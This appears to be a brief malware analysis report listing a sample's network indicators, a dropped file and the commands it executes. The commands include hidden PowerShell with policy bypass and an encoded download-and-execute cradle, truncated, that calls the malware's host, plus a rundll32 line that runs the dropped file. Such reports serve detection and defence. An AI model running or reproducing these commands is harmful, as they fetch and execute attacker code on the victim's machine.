Technical Information
- http://me###ida.top/888g100/index.php
- %TEMP%\spngmqhc.dat
- 'me###ida.top':80
- http://me###ida.top/888g100/main.php
- DNS ASK me###ida.top
- '<SYSTEM32>\cmd.exe' /c POwersheLL -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQBl...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c POwersheLL -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQBl...
- '<SYSTEM32>\rundll32.exe' %TEMP%\spnGmqHc.dat f1